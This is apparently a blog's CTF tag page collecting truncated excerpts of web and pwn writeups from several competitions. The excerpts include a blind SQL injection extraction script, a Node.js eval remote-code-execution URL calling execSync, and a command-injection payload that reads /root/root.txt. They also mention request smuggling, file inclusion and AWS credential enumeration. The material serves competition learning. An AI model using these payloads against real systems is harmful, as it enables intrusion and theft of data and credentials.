Bài đăng

Hiển thị các bài đăng có nhãn ctf
Hình ảnh
 WolvCTF and i did my best. Hello guys, our team got rank 48th when i decide to write this writeup. I had just solved 2 web. Have no time for Other up 2,3,4 challenges btw i will do it later. Web1: Bean Cafe We need upload 2 difference images but same the md5 hash I found this drive which contain 2  image :d thx someone whose i dont know the name lmao https://drive.google.com/drive/folders/1eCcMtQkHTreAJT6JmwxG10x1HbT6prY0 Uploaded it Web2: Order Up 1  This is my script. Yeah that's all import requests import json import string a = string.printable s = "" url = "https://dyn-svc-order-up-xec3il0vccu5tn6p0q2n-okntin33tq-ul.a.run.app/query" for i in range ( 1 , 100 ):     for j in a:         data = {             "col1" : "item_name" ,             "order" : f " (case when (ascii(substr(current_query(), { i } ,1))= { ord (j) } ) then item_name else category end)"             #(case when (ascii(substr(current_database
Hình ảnh
 0xl4ughCTF và mình đã quá chủ quan. Mình cứ nghĩ giải này nó kiểu dễ dễ nhưng nó bruh thật đấy :V Member team mình nghỉ Tết hết roài nên chơi một mình thoai :< Web1:  Micro Bài này mình được cho source, xem qua cấu trúc thư mục trước đã index.php <?php error_reporting ( 0 ); function Check_Admin ( $input ) {     $input = iconv ( 'UTF-8' , 'US-ASCII//TRANSLIT' , $input );   // Just to Normalize the string to UTF-8     if ( preg_match ( "/admin/i" , $input ))     {         return true ;     }     else     {         return false ;     } } function send_to_api ( $data ) {     $api_url = 'http://127.0.0.1:5000/login' ;     $options = [         'http' => [             'method' => 'POST' ,             'header' => 'Content-Type: application/x-www-form-urlencoded' ,             'content' => $data ,         ],     ];     var_dump ( $options );     $context = stream_context_create ( $op
Hình ảnh
 TetCTF và hành trình bú bẩn không thành Hello ae, tình hình là phải cập nhật cloud sớm thôi chứ không ổn rồi :v Mình writeup bài web1, bài này tốn kha khá thời gian của mình T_T. ----------------------------------------------------------------------- Web1: Hello from API GW Truy cập link tác giả cung cấp thôi Lúc đầu mình nhận định là ssti, php hoặc là python. Nhưng thực ra không phải, nó là nodejs, được đặt trong eval. Thế thì dễ. https://huk5xbypcc.execute-api.ap-southeast-2.amazonaws.com/dev/vulnerable?vulnerable=[require(%27child_process%27).execSync(%27ls -la%27).toString()] Tuy nhiên, mình đã không tìm được file flag kèm với tên category là cloud nên mình đã chuyển sang exploit cloud, có vẻ là Amazon web services(AWS). Thực sự mình không biết mô tê về cái này nên hơi mất tg research. Dựa vào thông tin trong env mình đã xác định được 2 acc là AWS_ và ENV_ Mình bị rơi vào stuck chỗ này chỉ đụng mỗi cái AWS_ :V nhưng mà thk ENV_ thì okela nha Sài tool này để enum. Chú ý vào phần s

KMA TTV

Mấy nay tui lười viết wu quá, nhưng mà đại loại là khum clear đc web(6/10 chall) còn làm khá ngoo nữa nên viết sẽ bị chê cười. Đăng tạm 3 prog solve script. T định clear hết prog nhưng lười quá, mà thấy sú nữa, t biết code đ đâu :V Prog1: import json from pwn import * r = remote ( '103.162.14.116' , 14002 ) try :     while ( True ) :         print ( r . recvline ())         r . recvuntil ( b "arr =" )         s = r . recvline (). decode ()         print ( s )         u = max ( json . loads ( s ))         r . sendline ( bytes ( str ( u ), "utf-8" )) except :     print ( r . recvline ()) r . interactive () # print(max( [35108217398665520798322916107816, 778190297752053830054479172279829, 433248835926907151366557863609100, 530511307645369300518075525954125, 319041740549641573432614280680049, 54889066684876542565651338313320, 555523546383080759680027939296310, 743500905362792400800205265076928, 568493246032607782686888251069529, 73281316704799390114350
Hình ảnh
KMA THI SINH VIÊN ATTT CẤP HỌC VIỆN Hế lô ae, giải này end cũng mấy hôm rồi nhưng mà mình cũng chưa định viết writeup do còn 2 bài web nữa chưa xong :( Nhưng mà kệ đi, dưới đây là 3 bài mình đã solve. :( Pwn1: Welcome to KCSC Bài này mình chỉ đăng script thôi, xin nhỗi mn :> from pwn import * import requests # elf = context.binary = ELF("./advice") pay1 = b ''' Hello" && /usr/bin/as @/root/root.txt; echo" ''' pay2 = b " 111111 " # r = elf.process([pay1, pay2]) d = requests . post ( " http://103.162.14.116:5001/contact " , data ={ " name " : pay1 , " advice " : pay2 } ) print ( d . text ) # r.interactive() Web1: You are a good admin. Mn có thể tải file tại đây . Sau khi build docker xong, hãy quan sát một chút về code  có 4 route là / /login /admin /file. Cái /tesing là mình tự thêm vào nên mn không cần để ý đâu :)) Tại route /file, ta dễ thấy nó đang bị lỗi file inclusion tại tham số f.
Hình ảnh
CSAWCTF VÀ TEAM MÌNH ĐÃ CỐ HẾT SỨC. Hello mn, chúng ta lại gặp nhau rồi :v Tại thời điểm mình ghi writeup thì bọn mình đang ở top 286, một kết quả khá khả quan đối với bọn mình. :v Và tất nhiên là bên mình vẫn sẽ tuyển các bạn RE tích cực hoạt động để kéo thành tích nhóm lên nhé :v Mình sẽ ghi writeup 2 bài web mình đã solve, khá là tệ :( +) Smug-Dino +) Philantrophy Web1: Smug-Dino Hãy xem thử link thử thách tác giả cung cấp.  Ta thấy rằng có 2 endpoint /flag và /hint khi truy cập /flag thì nó lại về localhost:3009/flag.txt. Còn khi truy cập /hint nó trả về page như này Server name là nginx và version của nó là 1.17.6 Sau khi truy cập thì được hint. 1 hồi search, mình thấy có một CVE-2019-20372 về NGINX http request smuggling. Đổi connection thành keep-alive và nhận về kết quả như sau. Xác định được lỗi, bây giờ đọc flag thôi :v Thực sự mình cũng đếch hiểu tạo sao lúc được lúc không, nhưng mn cứ post như này là ăn :v Cần thì cứ spam các kiểu đi. Web2: Philantrophy Bài này chủ yếu là r
Hình ảnh
  PatriotCTF và Spycio.Kon-Team Hello my friend, PatriotCTF is a beginner-friendly capture-the-flag competition hosted by GMU's cybersecurity club, MasonCC. So it's not too hard for me. At least I think so haha This is a writeup for 4/5 web chall which i solved. Ahh Im trying to improve my skill english so my writeup will not gud.  Okay, let's go. +) Scavenger Hunt (beginer) +) Flower Shop (medium) +) Pick Your Starter (medium) +) One-for-all (hard???) Web1: Scavenger Hunt In homepage, i got the first part of flag.  view source code, i got the second part At /robots.txt. I found the third pard. So sweet  And the script1.js, i got fourth part :D Finally, check cookie and we got the last piece of the flag. Web3:  Flower Shop Well well, as you can see, this is a white box. Let's check source code. I found where we can inject command to rce into file reset.class.php The link webhook was not filtered. :D I used requestrepo as webhook. u can use it here . I signup a new acc l